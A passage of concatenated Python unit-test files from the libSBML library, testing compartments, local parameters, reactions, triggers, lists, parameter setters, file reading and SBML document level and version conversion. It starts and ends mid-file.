self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) )
self.C.setSpatialDimensions(1.5)
self.assertEqual( True, self.C.isSetSpatialDimensions() )
self.assert_( self.C.getSpatialDimensionsAsDouble() == 1.5 )
self.C.unsetSpatialDimensions()
self.assertEqual( False, self.C.isSetSpatialDimensions() )
self.assertEqual( True, isnan(self.C.getSpatialDimensionsAsDouble()) )
pass
def test_L3_Compartment_units(self):
units = "volume";
self.assertEqual( False, self.C.isSetUnits() )
self.C.setUnits(units)
self.assert_(( units == self.C.getUnits() ))
self.assertEqual( True, self.C.isSetUnits() )
if (self.C.getUnits() == units):
pass
self.C.unsetUnits()
self.assertEqual( False, self.C.isSetUnits() )
if (self.C.getUnits() != None):
pass
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3Compartment))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3LocalParameter.py
```python
import sys
import unittest
import libsbml
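# Unit tests for libsbml.LocalParameter (Level 3 Version 1): an unset value
# reports NaN, and "id" is the only required attribute.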
def isnan(x):
return (x != x)
pass
class TestL3LocalParameter(unittest.TestCase):
global P
P = None
def setUp(self):
self.P = libsbml.LocalParameter(3,1)
if (self.P == None):
pass
pass
def tearDown(self):
_dummyList = [ self.P ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_NS(self):
self.assert_( self.P.getNamespaces() != None )
self.assert_( self.P.getNamespaces().getLength() == 1 )
self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.P.getNamespaces().getURI(0) ))
pass
def test_L3_LocalParameter_create(self):
self.assert_( self.P.getTypeCode() == libsbml.SBML_LOCAL_PARAMETER )
self.assert_( self.P.getMetaId() == "" )
self.assert_( self.P.getNotes() == None )
self.assert_( self.P.getAnnotation() == None )
self.assert_( self.P.getId() == "" )
self.assert_( self.P.getName() == "" )
self.assert_( self.P.getUnits() == "" )
self.assertEqual( True, isnan(self.P.getValue()) )
self.assertEqual( False, self.P.isSetId() )
self.assertEqual( False, self.P.isSetName() )
self.assertEqual( False, self.P.isSetValue() )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_L3_LocalParameter_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(3,1)
sbmlns.addNamespaces(xmlns)
p = libsbml.LocalParameter(sbmlns)
self.assert_( p.getTypeCode() == libsbml.SBML_LOCAL_PARAMETER )
self.assert_( p.getMetaId() == "" )
self.assert_( p.getNotes() == None )
self.assert_( p.getAnnotation() == None )
self.assert_( p.getLevel() == 3 )
self.assert_( p.getVersion() == 1 )
self.assert_( p.getNamespaces() != None )
self.assert_( p.getNamespaces().getLength() == 2 )
self.assert_( p.getId() == "" )
self.assert_( p.getName() == "" )
self.assert_( p.getUnits() == "" )
self.assertEqual( True, isnan(p.getValue()) )
self.assertEqual( False, p.isSetId() )
self.assertEqual( False, p.isSetName() )
self.assertEqual( False, p.isSetValue() )
self.assertEqual( False, p.isSetUnits() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_hasRequiredAttributes(self):
p = libsbml.LocalParameter(3,1)
self.assertEqual( False, p.hasRequiredAttributes() )
p.setId( "id")
self.assertEqual( True, p.hasRequiredAttributes() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_LocalParameter_id(self):
id = "mitochondria";
self.assertEqual( False, self.P.isSetId() )
self.P.setId(id)
self.assert_(( id == self.P.getId() ))
self.assertEqual( True, self.P.isSetId() )
if (self.P.getId() == id):
pass
pass
def test_L3_LocalParameter_name(self):
name = "My_Favorite_Factory";
self.assertEqual( False, self.P.isSetName() )
self.P.setName(name)
self.assert_(( name == self.P.getName() ))
self.assertEqual( True, self.P.isSetName() )
if (self.P.getName() == name):
pass
self.P.unsetName()
self.assertEqual( False, self.P.isSetName() )
if (self.P.getName() != None):
pass
pass
def test_L3_LocalParameter_units(self):
units = "volume";
self.assertEqual( False, self.P.isSetUnits() )
self.P.setUnits(units)
self.assert_(( units == self.P.getUnits() ))
self.assertEqual( True, self.P.isSetUnits() )
if (self.P.getUnits() == units):
pass
self.P.unsetUnits()
self.assertEqual( False, self.P.isSetUnits() )
if (self.P.getUnits() != None):
pass
pass
def test_L3_LocalParameter_value(self):
self.assertEqual( False, self.P.isSetValue() )
self.assertEqual( True, isnan(self.P.getValue()) )
self.P.setValue(1.5)
self.assertEqual( True, self.P.isSetValue() )
self.assert_( self.P.getValue() == 1.5 )
self.P.unsetValue()
self.assertEqual( False, self.P.isSetValue() )
self.assertEqual( True, isnan(self.P.getValue()) )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3LocalParameter))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3Reaction.py
```python
import sys
import unittest
import libsbml
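# Unit tests for libsbml.Reaction (Level 3 Version 1): "id", "fast" and
# "reversible" must all be set before hasRequiredAttributes() passes.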
class TestL3Reaction(unittest.TestCase):
global R
R = None
def setUp(self):
self.R = libsbml.Reaction(3,1)
if (self.R == None):
pass
pass
def tearDown(self):
_dummyList = [ self.R ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_NS(self):
self.assert_( self.R.getNamespaces() != None )
self.assert_( self.R.getNamespaces().getLength() == 1 )
self.assert_(( "http://www.sbml.org/sbml/level3/version1/core" == self.R.getNamespaces().getURI(0) ))
pass
def test_L3_Reaction_compartment(self):
compartment = "cell";
self.assertEqual( False, self.R.isSetCompartment() )
self.R.setCompartment(compartment)
self.assert_(( compartment == self.R.getCompartment() ))
self.assertEqual( True, self.R.isSetCompartment() )
if (self.R.getCompartment() == compartment):
pass
self.R.unsetCompartment()
self.assertEqual( False, self.R.isSetCompartment() )
if (self.R.getCompartment() != None):
pass
pass
def test_L3_Reaction_create(self):
self.assert_( self.R.getTypeCode() == libsbml.SBML_REACTION )
self.assert_( self.R.getMetaId() == "" )
self.assert_( self.R.getNotes() == None )
self.assert_( self.R.getAnnotation() == None )
self.assert_( self.R.getId() == "" )
self.assert_( self.R.getName() == "" )
self.assert_( self.R.getCompartment() == "" )
self.assert_( self.R.getFast() == False )
self.assert_( self.R.getReversible() == True )
self.assertEqual( False, self.R.isSetId() )
self.assertEqual( False, self.R.isSetName() )
self.assertEqual( False, self.R.isSetCompartment() )
self.assertEqual( False, self.R.isSetFast() )
self.assertEqual( False, self.R.isSetReversible() )
pass
def test_L3_Reaction_createWithNS(self):
xmlns = libsbml.XMLNamespaces()
xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(3,1)
sbmlns.addNamespaces(xmlns)
r = libsbml.Reaction(sbmlns)
self.assert_( r.getTypeCode() == libsbml.SBML_REACTION )
self.assert_( r.getMetaId() == "" )
self.assert_( r.getNotes() == None )
self.assert_( r.getAnnotation() == None )
self.assert_( r.getLevel() == 3 )
self.assert_( r.getVersion() == 1 )
self.assert_( r.getNamespaces() != None )
self.assert_( r.getNamespaces().getLength() == 2 )
self.assert_( r.getId() == "" )
self.assert_( r.getName() == "" )
self.assert_( r.getCompartment() == "" )
self.assert_( r.getFast() == False )
self.assert_( r.getReversible() == True )
self.assertEqual( False, r.isSetId() )
self.assertEqual( False, r.isSetName() )
self.assertEqual( False, r.isSetCompartment() )
self.assertEqual( False, r.isSetFast() )
self.assertEqual( False, r.isSetReversible() )
_dummyList = [ r ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_fast(self):
self.assert_( self.R.isSetFast() == False )
self.R.setFast(True)
self.assert_( self.R.getFast() == True )
self.assert_( self.R.isSetFast() == True )
self.R.setFast(False)
self.assert_( self.R.getFast() == False )
self.assert_( self.R.isSetFast() == True )
pass
def test_L3_Reaction_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_hasRequiredAttributes(self):
r = libsbml.Reaction(3,1)
self.assertEqual( False, r.hasRequiredAttributes() )
r.setId( "id")
self.assertEqual( False, r.hasRequiredAttributes() )
r.setFast(False)
self.assertEqual( False, r.hasRequiredAttributes() )
r.setReversible(False)
self.assertEqual( True, r.hasRequiredAttributes() )
_dummyList = [ r ]; _dummyList[:] = []; del _dummyList
pass
def test_L3_Reaction_id(self):
id = "mitochondria";
self.assertEqual( False, self.R.isSetId() )
self.R.setId(id)
self.assert_(( id == self.R.getId() ))
self.assertEqual( True, self.R.isSetId() )
if (self.R.getId() == id):
pass
pass
def test_L3_Reaction_name(self):
name = "My_Favorite_Factory";
self.assertEqual( False, self.R.isSetName() )
self.R.setName(name)
self.assert_(( name == self.R.getName() ))
self.assertEqual( True, self.R.isSetName() )
if (self.R.getName() == name):
pass
self.R.unsetName()
self.assertEqual( False, self.R.isSetName() )
if (self.R.getName() != None):
pass
pass
def test_L3_Reaction_reversible(self):
self.assert_( self.R.isSetReversible() == False )
self.R.setReversible(True)
self.assert_( self.R.getReversible() == True )
self.assert_( self.R.isSetReversible() == True )
self.R.setReversible(False)
self.assert_( self.R.getReversible() == False )
self.assert_( self.R.isSetReversible() == True )
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3Reaction))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestL3Trigger.py
```python
import sys
import unittest
import libsbml
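# Unit tests for libsbml.Trigger: the L3-only "initialValue" and "persistent"
# attributes; setting them on a Level 2 trigger returns
# LIBSBML_UNEXPECTED_ATTRIBUTE.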
class TestL3Trigger(unittest.TestCase):
global T
T = None
def setUp(self):
self.T = libsbml.Trigger(3,1)
if (self.T == None):
pass
pass
def tearDown(self):
_dummyList = [ self.T ]; _dummyList[:] = []; del _dummyList
pass
def test_L3Trigger_create(self):
self.assert_( self.T.getTypeCode() == libsbml.SBML_TRIGGER )
self.assert_( self.T.getMetaId() == "" )
self.assert_( self.T.getNotes() == None )
self.assert_( self.T.getAnnotation() == None )
self.assert_( self.T.getMath() == None )
self.assert_( self.T.getInitialValue() == 1 )
self.assert_( self.T.getPersistent() == 1 )
self.assert_( self.T.isSetInitialValue() == 0 )
self.assert_( self.T.isSetPersistent() == 0 )
pass
def test_L3Trigger_setInitialValue(self):
i = self.T.setInitialValue(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getInitialValue() == 0 )
self.assert_( self.T.isSetInitialValue() == 1 )
i = self.T.setInitialValue(1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getInitialValue() == 1 )
self.assert_( self.T.isSetInitialValue() == 1 )
pass
def test_L3Trigger_setInitialValue1(self):
t = libsbml.Trigger(2,4)
i = t.setInitialValue(0)
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
    self.assert_( t.getInitialValue() == 1 )
    self.assert_( t.isSetInitialValue() == 0 )
_dummyList = [ t ]; _dummyList[:] = []; del _dummyList
pass
def test_L3Trigger_setPersistent(self):
i = self.T.setPersistent(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getPersistent() == 0 )
self.assert_( self.T.isSetPersistent() == 1 )
i = self.T.setPersistent(1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.T.getPersistent() == 1 )
self.assert_( self.T.isSetPersistent() == 1 )
pass
def test_L3Trigger_setPersistent1(self):
t = libsbml.Trigger(2,4)
i = t.setPersistent(0)
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
    self.assert_( t.getPersistent() == 1 )
    self.assert_( t.isSetPersistent() == 0 )
_dummyList = [ t ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestL3Trigger))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestListOf.py
```python
import sys
import unittest
import libsbml
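# Unit tests for libsbml.ListOf: a typed list such as ListOfCompartments
# rejects append() of the wrong element type; clear() and remove() empty
# a generic list.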
class TestListOf(unittest.TestCase):
def test_ListOf_append(self):
m = libsbml.Model(2,4)
m.createCompartment()
loc = m.getListOfCompartments()
self.assert_( loc.size() == 1 )
c = libsbml.Compartment(2,4)
i = loc.append(c)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( loc.size() == 2 )
sp = libsbml.Species(2,4)
i = loc.append(sp)
self.assert_( i == libsbml.LIBSBML_INVALID_OBJECT )
self.assert_( loc.size() == 2 )
_dummyList = [ m ]; _dummyList[:] = []; del _dummyList
_dummyList = [ sp ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_clear(self):
lo = libsbml.ListOf(2,4)
sp = libsbml.Species(2,4)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
self.assert_( lo.size() == 5 )
lo.clear(True)
self.assert_( lo.size() == 0 )
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.appendAndOwn(sp)
self.assert_( lo.size() == 5 )
elem = lo.get(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(1)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(2)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(3)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.get(4)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
lo.clear(False)
self.assert_( lo.size() == 0 )
_dummyList = [ lo ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_create(self):
lo = libsbml.ListOf(2,4)
self.assert_( lo.getTypeCode() == libsbml.SBML_LIST_OF )
self.assert_( lo.getNotes() == None )
self.assert_( lo.getAnnotation() == None )
self.assert_( lo.getMetaId() == "" )
self.assert_( lo.size() == 0 )
_dummyList = [ lo ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_ListOf_remove(self):
lo = libsbml.ListOf(2,4)
sp = libsbml.Species(2,4)
self.assert_( lo.size() == 0 )
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
self.assert_( lo.size() == 5 )
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
elem = lo.remove(0)
_dummyList = [ elem ]; _dummyList[:] = []; del _dummyList
self.assert_( lo.size() == 0 )
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.append(sp)
lo.appendAndOwn(sp)
self.assert_( lo.size() == 5 )
_dummyList = [ lo ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestListOf))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestParameter_newSetters.py
```python
import sys
import unittest
import libsbml
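# Unit tests for libsbml.Parameter setters and their return codes: invalid
# SIds are rejected, and some attributes (e.g. "constant" at Level 1) are
# unexpected for the parameter's SBML level.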
class TestParameter_newSetters(unittest.TestCase):
global P
P = None
def setUp(self):
self.P = libsbml.Parameter(1,2)
if (self.P == None):
pass
pass
def tearDown(self):
_dummyList = [ self.P ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setConstant1(self):
i = self.P.setConstant(False)
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( self.P.getConstant() == False )
pass
def test_Parameter_setConstant2(self):
p = libsbml.Parameter(2,2)
i = p.setConstant(False)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( p.getConstant() == False )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setId1(self):
i = self.P.setId( "1cell")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assertEqual( False, self.P.isSetId() )
pass
def test_Parameter_setId2(self):
i = self.P.setId( "cell")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, self.P.isSetId() )
self.assert_(( "cell" == self.P.getId() ))
i = self.P.setId("")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetId() )
pass
def test_Parameter_setName1(self):
i = self.P.setName( "cell")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, self.P.isSetName() )
i = self.P.unsetName()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetName() )
pass
def test_Parameter_setName2(self):
p = libsbml.Parameter(2,2)
i = p.setName( "1cell")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, p.isSetName() )
i = p.unsetName()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, p.isSetName() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setName3(self):
p = libsbml.Parameter(1,2)
i = p.setName( "11pp")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assertEqual( False, p.isSetName() )
i = p.setName("")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, p.isSetName() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def test_Parameter_setUnits1(self):
i = self.P.setUnits( "1cell")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assertEqual( False, self.P.isSetUnits() )
i = self.P.unsetUnits()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_Parameter_setUnits2(self):
i = self.P.setUnits( "litre")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( True, self.P.isSetUnits() )
i = self.P.unsetUnits()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_Parameter_setUnits3(self):
i = self.P.setUnits("")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetUnits() )
pass
def test_Parameter_setValue1(self):
i = self.P.setValue(2.0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( self.P.getValue() == 2.0 )
self.assertEqual( True, self.P.isSetValue() )
i = self.P.unsetValue()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, self.P.isSetValue() )
pass
def test_Parameter_setValue2(self):
p = libsbml.Parameter(2,2)
i = p.unsetValue()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assertEqual( False, p.isSetValue() )
_dummyList = [ p ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestParameter_newSetters))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestReadFromFile1.py
```python
import sys
import unittest
import libsbml
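# Reads the sample model l1v1-branch.xml and verifies the compartment,
# species, reactions and kinetic laws (including derived unit definitions)
# it is expected to contain.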
class TestReadFromFile1(unittest.TestCase):
def test_read_l1v1_branch(self):
filename = "../../sbml/test/test-data/l1v1-branch.xml"
d = libsbml.readSBML(filename)
if (d == None):
pass
self.assert_( d.getLevel() == 1 )
self.assert_( d.getVersion() == 1 )
m = d.getModel()
self.assert_(( "Branch" == m.getName() ))
self.assert_( m.getNumCompartments() == 1 )
c = m.getCompartment(0)
self.assert_(( "compartmentOne" == c.getName() ))
self.assert_( c.getVolume() == 1 )
ud = c.getDerivedUnitDefinition()
self.assert_( ud.getNumUnits() == 1 )
self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_LITRE )
self.assert_( m.getNumSpecies() == 4 )
s = m.getSpecies(0)
self.assert_(( "S1" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == False )
ud = s.getDerivedUnitDefinition()
self.assert_( ud.getNumUnits() == 2 )
self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_MOLE )
self.assert_( ud.getUnit(0).getExponent() == 1 )
self.assert_( ud.getUnit(1).getKind() == libsbml.UNIT_KIND_LITRE )
self.assert_( ud.getUnit(1).getExponent() == -1 )
s = m.getSpecies(1)
self.assert_(( "X0" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == True )
s = m.getSpecies(2)
self.assert_(( "X1" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == True )
s = m.getSpecies(3)
self.assert_(( "X2" == s.getName() ))
self.assert_(( "compartmentOne" == s.getCompartment() ))
self.assert_( s.getInitialAmount() == 0 )
self.assert_( s.getBoundaryCondition() == True )
self.assert_( m.getNumReactions() == 3 )
r = m.getReaction(0)
self.assert_(( "reaction_1" == r.getName() ))
self.assert_( r.getReversible() == False )
self.assert_( r.getFast() == False )
ud = r.getKineticLaw().getDerivedUnitDefinition()
self.assert_( ud.getNumUnits() == 2 )
self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_MOLE )
self.assert_( ud.getUnit(0).getExponent() == 1 )
self.assert_( ud.getUnit(1).getKind() == libsbml.UNIT_KIND_LITRE )
self.assert_( ud.getUnit(1).getExponent() == -1 )
self.assert_( r.getKineticLaw().containsUndeclaredUnits() == True )
r = m.getReaction(1)
self.assert_(( "reaction_2" == r.getName() ))
self.assert_( r.getReversible() == False )
self.assert_( r.getFast() == False )
r = m.getReaction(2)
self.assert_(( "reaction_3" == r.getName() ))
self.assert_( r.getReversible() == False )
self.assert_( r.getFast() == False )
r = m.getReaction(0)
self.assert_( r.getNumReactants() == 1 )
self.assert_( r.getNumProducts() == 1 )
sr = r.getReactant(0)
self.assert_(( "X0" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
sr = r.getProduct(0)
self.assert_(( "S1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
kl = r.getKineticLaw()
self.assert_(( "k1 * X0" == kl.getFormula() ))
self.assert_( kl.getNumParameters() == 1 )
p = kl.getParameter(0)
self.assert_(( "k1" == p.getName() ))
self.assert_( p.getValue() == 0 )
r = m.getReaction(1)
self.assert_( r.getNumReactants() == 1 )
self.assert_( r.getNumProducts() == 1 )
sr = r.getReactant(0)
self.assert_(( "S1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
sr = r.getProduct(0)
self.assert_(( "X1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
kl = r.getKineticLaw()
self.assert_(( "k2 * S1" == kl.getFormula() ))
self.assert_( kl.getNumParameters() == 1 )
p = kl.getParameter(0)
self.assert_(( "k2" == p.getName() ))
self.assert_( p.getValue() == 0 )
r = m.getReaction(2)
self.assert_( r.getNumReactants() == 1 )
self.assert_( r.getNumProducts() == 1 )
sr = r.getReactant(0)
self.assert_(( "S1" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
sr = r.getProduct(0)
self.assert_(( "X2" == sr.getSpecies() ))
self.assert_( sr.getStoichiometry() == 1 )
self.assert_( sr.getDenominator() == 1 )
kl = r.getKineticLaw()
self.assert_(( "k3 * S1" == kl.getFormula() ))
self.assert_( kl.getNumParameters() == 1 )
p = kl.getParameter(0)
self.assert_(( "k3" == p.getName() ))
self.assert_( p.getValue() == 0 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestReadFromFile1))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/sbml/TestSBMLDocument.py
```python
import sys
import unittest
import libsbml
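# Unit tests for libsbml.SBMLDocument: default level/version,
# setLevelAndVersion() conversion (strict and non-strict) and the
# copy/mismatch behaviour of setModel().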
class TestSBMLDocument(unittest.TestCase):
def test_SBMLDocument_create(self):
d = libsbml.SBMLDocument()
self.assert_( d.getTypeCode() == libsbml.SBML_DOCUMENT )
self.assert_( d.getNotes() == None )
self.assert_( d.getAnnotation() == None )
self.assert_( d.getLevel() == 3 )
self.assert_( d.getVersion() == 1 )
self.assert_( d.getNumErrors() == 0 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_createWith(self):
d = libsbml.SBMLDocument(1,2)
self.assert_( d.getTypeCode() == libsbml.SBML_DOCUMENT )
self.assert_( d.getNotes() == None )
self.assert_( d.getAnnotation() == None )
self.assert_( d.getLevel() == 1 )
self.assert_( d.getVersion() == 2 )
self.assert_( d.getNumErrors() == 0 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,2)
d.setModel(m1)
self.assert_( d.setLevelAndVersion(2,3,False) == True )
self.assert_( d.setLevelAndVersion(2,1,False) == True )
self.assert_( d.setLevelAndVersion(1,2,False) == True )
self.assert_( d.setLevelAndVersion(1,1,False) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion_Error(self):
d = libsbml.SBMLDocument()
d.setLevelAndVersion(2,1,True)
m1 = libsbml.Model(2,1)
u = libsbml.Unit(2,1)
u.setKind(libsbml.UnitKind_forName("mole"))
u.setOffset(3.2)
ud = libsbml.UnitDefinition(2,1)
ud.setId( "ud")
ud.addUnit(u)
m1.addUnitDefinition(ud)
d.setModel(m1)
self.assert_( d.setLevelAndVersion(2,2,True) == False )
self.assert_( d.setLevelAndVersion(2,3,True) == False )
self.assert_( d.setLevelAndVersion(1,2,True) == False )
self.assert_( d.setLevelAndVersion(1,1,True) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion_UnitsError(self):
d = libsbml.SBMLDocument()
d.setLevelAndVersion(2,4,False)
m1 = d.createModel()
c = m1.createCompartment()
c.setId( "c")
p = m1.createParameter()
p.setId( "p")
p.setUnits( "mole")
r = m1.createAssignmentRule()
r.setVariable( "c")
r.setFormula( "p*p")
self.assert_( d.setLevelAndVersion(2,2,False) == True )
self.assert_( d.setLevelAndVersion(2,3,False) == True )
self.assert_( d.setLevelAndVersion(1,2,False) == True )
self.assert_( d.setLevelAndVersion(1,1,False) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setLevelAndVersion_Warning(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,2)
    m1.setSBOTerm(2)
d.setModel(m1)
self.assert_( d.setLevelAndVersion(2,3,False) == True )
self.assert_( d.setLevelAndVersion(2,1,False) == True )
self.assert_( d.setLevelAndVersion(1,2,False) == True )
self.assert_( d.setLevelAndVersion(1,1,False) == False )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel(self):
d = libsbml.SBMLDocument(2,4)
m1 = libsbml.Model(2,4)
m2 = libsbml.Model(2,4)
self.assert_( d.getModel() == None )
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
self.assert_( mout != None )
self.assert_( mout != m1 )
i = d.setModel(d.getModel())
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
self.assert_( mout != None )
self.assert_( mout != m1 )
i = d.setModel(m2)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
self.assert_( mout != None )
self.assert_( mout != m2 )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel1(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(2,1)
i = d.setModel(m1)
self.assert_( i == libsbml.LIBSBML_VERSION_MISMATCH )
self.assert_( d.getModel() == None )
_dummyList = [ d ]; _dummyList[:] = []; del _dummyList
pass
def test_SBMLDocument_setModel2(self):
d = libsbml.SBMLDocument(2,2)
m1 = libsbml.Model(1,2)
m1.createCompartment()
i = d.setModel(m1)
